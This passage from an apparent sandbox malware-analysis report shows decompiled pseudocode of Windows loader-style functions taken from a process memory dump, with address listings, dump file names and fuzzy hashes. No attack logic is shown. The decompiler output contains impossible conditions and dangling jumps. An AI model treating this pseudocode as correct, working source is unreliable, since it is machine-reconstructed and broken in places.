				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x49c8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E04902EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E04902EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E048D58EC(_t240);
									_t221 =  *0x49c5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x49c5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E04914A2C(0x49c6e40, 0x4914b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E048F7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x48b5c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E0490F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E0490F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E04957016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L048F2400(_t267 + 0x20);
															}
															L048F2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E04902397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E048F2280(_t134, 0x49c8608);
									__eflags =  *0x49c6e48 - _t253; // 0x51c450
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E048EFFB0(_t198, _t241, 0x49c8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x49c6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x49c8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E04906B90(_t210,  &_v64);
										_t262 =  *0x49c8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E0490E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E049197C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0491006A(0x49c8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x49c8608);
												E0491B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x49c6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x49c6e48; // 0x51c450
							_v72 = _t229;
							if(_t229 == 0) {
								L45:
								E048EFFB0(_t198, _t240, 0x49c8608);
								_t253 = _v76;
								goto L29;
							}
							if( *((char*)(_t229 + 0x40)) != 0) {
								L13:
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E049100C2(0x49c8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
							_t18 = _t229 + 0x38; // 0x0
							if( *_t18 !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								goto L45;
							}
							goto L13;
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}

0x049020a0
0x049020a8
0x049020ad
0x049020b3
0x049020b8
0x049020c2
0x049020c7
0x049020cb
0x049020d2
0x04902263
0x04902266
0x04945836
0x04945836
0x00000000
0x0490226c
0x0490226c
0x04902270
0x04902274
0x049020e2
0x049020e2
0x049020e6
0x049020ee
0x049457dc
0x049457de
0x049457ec
0x049457ec
0x049457f1
0x049457f3
0x049457f8
0x00000000
0x049457f8
0x049457e0
0x049457e4
0x049457ea
0x00000000
0x00000000
0x00000000
0x049457ea
0x049020f4
0x049020f4
0x049020f8
0x049020f8
0x049020fc
0x04902100
0x04902106
0x04902201
0x04902206
0x0490220b
0x0490220e
0x049022a9
0x049022ac
0x00000000
0x00000000
0x049022b2
0x049022b5
0x04945801
0x04945806
0x00000000
0x00000000
0x04945810
0x04945815
0x04945818
0x00000000
0x00000000
0x0494581e
0x049022bb
0x049022bb
0x04902218
0x04902218
0x0490221c
0x04902220
0x04902222
0x049022c2
0x049022c4
0x049022dc
0x049022dc
0x049022e1
0x00000000
0x00000000
0x00000000
0x049022e7
0x049022c8
0x049022cd
0x049022d3
0x049022d6
0x04945823
0x04945825
0x04945827
0x00000000
0x00000000
0x0494582d
0x00000000
0x0494582d
0x00000000
0x04902228
0x04902228
0x00000000
0x04902228
0x04902222
0x04902214
0x04902214
0x00000000
0x04902114
0x04902114
0x04902114
0x0490211a
0x0490211c
0x04902348
0x0490234d
0x04945840
0x04945845
0x04945848
0x0494584e
0x0494584e
0x04945848
0x04902353
0x04902355
0x04902388
0x04902388
0x04902368
0x0490236a
0x0490236c
0x0490238f
0x00000000
0x0490236e
0x0490236e
0x0490218e
0x0490218e
0x04902191
0x04902195
0x04945a03
0x04945a06
0x04945a0c
0x04945a0f
0x04945a11
0x04945a13
0x04945a13
0x04945a19
0x04945a1f
0x00000000
0x0490219b
0x0490219b
0x049021a0
0x04902282
0x04902284
0x04902284
0x04902284
0x04902284
0x049021a6
0x049021a9
0x049021ac
0x049021ae
0x049021b3
0x0490228b
0x04902290
0x04902379
0x04902296
0x04902298
0x04902298
0x04902290
0x049021b9
0x049021be
0x049022a2
0x049022a2
0x049021c4
0x049021c8
0x049021cc
0x049021d0
0x049021d4
0x049021de
0x049021e3
0x04945a29
0x04945a2c
0x00000000
0x00000000
0x04945a3b
0x00000000
0x049021e9
0x049021e9
0x049021e9
0x049021ee
0x049021f1
0x04945a45
0x04945a4b
0x04945a52
0x04945a58
0x04945a5d
0x04945a5f
0x04945a71
0x04945a61
0x04945a6a
0x04945a6a
0x04945a76
0x04945a79
0x04945a7f
0x04945a83
0x04945a85
0x04945a87
0x04945a87
0x04945a8c
0x04945a91
0x04945a97
0x04945a9f
0x04945aa0
0x04945aa1
0x04945aa6
0x04945aab
0x04945ab1
0x04945ab3
0x04945ab9
0x04945aca
0x04945ad4
0x04945ad4
0x04945ade
0x04945ade
0x04945aab
0x04945a79
0x04945a52
0x049021f7
0x049021f9
0x049021fe
0x049021fe
0x049021e3
0x04902195
0x0490236c
0x04902122
0x04902122
0x04902124
0x04902231
0x04902236
0x04902236
0x04902238
0x04902238
0x04902240
0x04902242
0x04902244
0x049459fc
0x0490218c
0x0490218c
0x00000000
0x0490218c
0x0490224a
0x0490224f
0x04902256
0x04902304
0x04902309
0x0490230f
0x0490231e
0x0490231e
0x0490231e
0x04902320
0x04902325
0x0490232a
0x0490232c
0x0490233e
0x0490233e
0x00000000
0x0490232c
0x04902311
0x04902317
0x0490231a
0x0490231c
0x04902380
0x04902380
0x04902380
0x04902384
0x00000000
0x00000000
0x04902386
0x00000000
0x0490231c
0x0490225c
0x0490225c
0x00000000
0x0490225c
0x0490212a
0x04902134
0x04902138
0x0490213d
0x04945858
0x04945863
0x04945863
0x04945867
0x0494586a
0x00000000
0x00000000
0x0494586c
0x0494586c
0x04945871
0x04945875
0x04945877
0x04945997
0x0494599c
0x049459a1
0x049459a7
0x049459a7
0x00000000
0x049459a7
0x0494587d
0x00000000
0x0494588b
0x0494588b
0x04945890
0x04945892
0x04945894
0x04945899
0x0494589b
0x049458a0
0x049458a0
0x049458aa
0x049458b2
0x049458b6
0x049458be
0x049458c6
0x049458c9
0x0494590d
0x04945917
0x0494591a
0x0494591c
0x04945920
0x04945928
0x0494592a
0x0494592c
0x0494592e
0x0494592e
0x049458cb
0x049458cd
0x049458d8
0x049458e0
0x049458f4
0x049458fe
0x049458fe
0x0494593a
0x0494593e
0x04945940
0x04945942
0x00000000
0x04945944
0x04945944
0x04945949
0x0494594e
0x0494594e
0x04945953
0x0494595b
0x04945976
0x04945976
0x0494597a
0x0494597f
0x00000000
0x00000000
0x00000000
0x00000000
0x04945981
0x04945981
0x04945981
0x04945983
0x04945988
0x0494598d
0x04945991
0x04945991
0x00000000
0x0494595d
0x0494595d
0x04945963
0x04945965
0x00000000
0x00000000
0x00000000
0x00000000
0x04945967
0x04945967
0x0494596b
0x0494596d
0x00000000
0x00000000
0x0494596f
0x04945971
0x04945971
0x04945974
0x00000000
0x00000000
0x00000000
0x04945974
0x00000000
0x04945967
0x0494595b
0x04945942
0x04945863
0x04902143
0x04902143
0x04902149
0x0490214f
0x049022ec
0x049022f1
0x049022f6
0x00000000
0x049022f6
0x04902159
0x04902173
0x04902173
0x0490217d
0x04902181
0x04902186
0x049459ae
0x049459b2
0x049459b5
0x049459b7
0x049459ba
0x049459cd
0x049459d1
0x049459d5
0x049459d9
0x049459db
0x00000000
0x00000000
0x049459dd
0x049459dd
0x049459e1
0x049459e4
0x049459e7
0x049459ee
0x049459ee
0x049459f3
0x049459f3
0x00000000
0x04902186
0x04902164
0x0490216d
0x00000000
0x00000000
0x00000000
0x0490216d
0x04902106
0x04902266
0x049020d8
0x049020da
0x049020e0
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 447ff56d783a34ac0579d21a4e4ce9d918156beabf71737a63006405a361b3d7
Instruction ID: 3c4eedb2dd4bc17b9f0c68279a46a9c042588d4ef52489be579faa149b4b17d5
Opcode Fuzzy Hash: 447ff56d783a34ac0579d21a4e4ce9d918156beabf71737a63006405a361b3d7
Instruction Fuzzy Hash: 41F1D231608341AFD725CFA8C444B2A77EAABC5724F05C9BDE9959B290E734FC40CB92

Uniqueness

Uniqueness Score: -1.00%

Function 048ED5E0, Relevance: .4, Instructions: 353
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E048ED5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				intOrPtr _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				intOrPtr _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				intOrPtr* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x49cd360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E048E6600(0x49c52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x49c7b9c; // 0x0
							_t281 = L048F4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0491F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x49c7b90; // 0x77df0000
								if(_t384 == 0) {
									_t353 =  *0x49c7b8c; // 0x513d80
									_v176 = _t353;
									_t63 = _t353 + 0x50; // 0x513e30
									_t64 =  *_t63 + 0x20; // 0x9
									_t320 =  *_t64;
									_v184 = _t320;
								} else {
									E048F2280(_t200, 0x49c84d8);
									_t277 =  *0x49c85f4; // 0x512b00
									_t351 =  *0x49c85f8 & 1;
									while(_t277 != 0) {
										_t21 = _t277 - 0x50; // 0x76130000
										_t337 =  *_t21;
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t23 = _t277 - 0x18; // 0x512b48
													_t340 =  *_t23;
													_t24 = _t277 - 0x68; // 0x512a98
													_t353 = _t24;
													_v176 = _t353;
													__eflags =  *((intOrPtr*)(_t340 + 0xc)) - 0xffffffff;
													if( *((intOrPtr*)(_t340 + 0xc)) != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t30 = _t353 + 0x50; // 0x512b48
															_t340 =  *_t30;
														}
													}
													_t31 = _t340 + 0x20; // 0x9
													_v184 =  *_t31;
												}
											} else {
												_t22 = _t277 + 4; // 0x512298
												_t339 =  *_t22;
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E048EFFB0(_t287, _t353, 0x49c84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0492CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E048E6600(0x49c52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E048E7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x49cb239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0495E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x49c8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x49cb218; // 0x0
														asm("ror edi, cl");
														 *0x49cb1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E048F2280(_t250, 0x49c84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L04913898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E048EFFB0(_t293, _t353, 0x49c84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E049137F5(_t353, 0);
																}
																E04910413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E04909B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E049002D6(_t174);
																}
																L048F77F0( *0x49c7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E0490C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L048EEC7F(_t353);
										L049019B8(_t287, 0, _t353, 0);
										_t200 = E048DF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0491B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x49cb2f8; // 0x790000
									if((_t206 |  *0x49cb2fc) == 0 || ( *0x49cb2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x49cb2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E04986B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E04986AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E048EE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
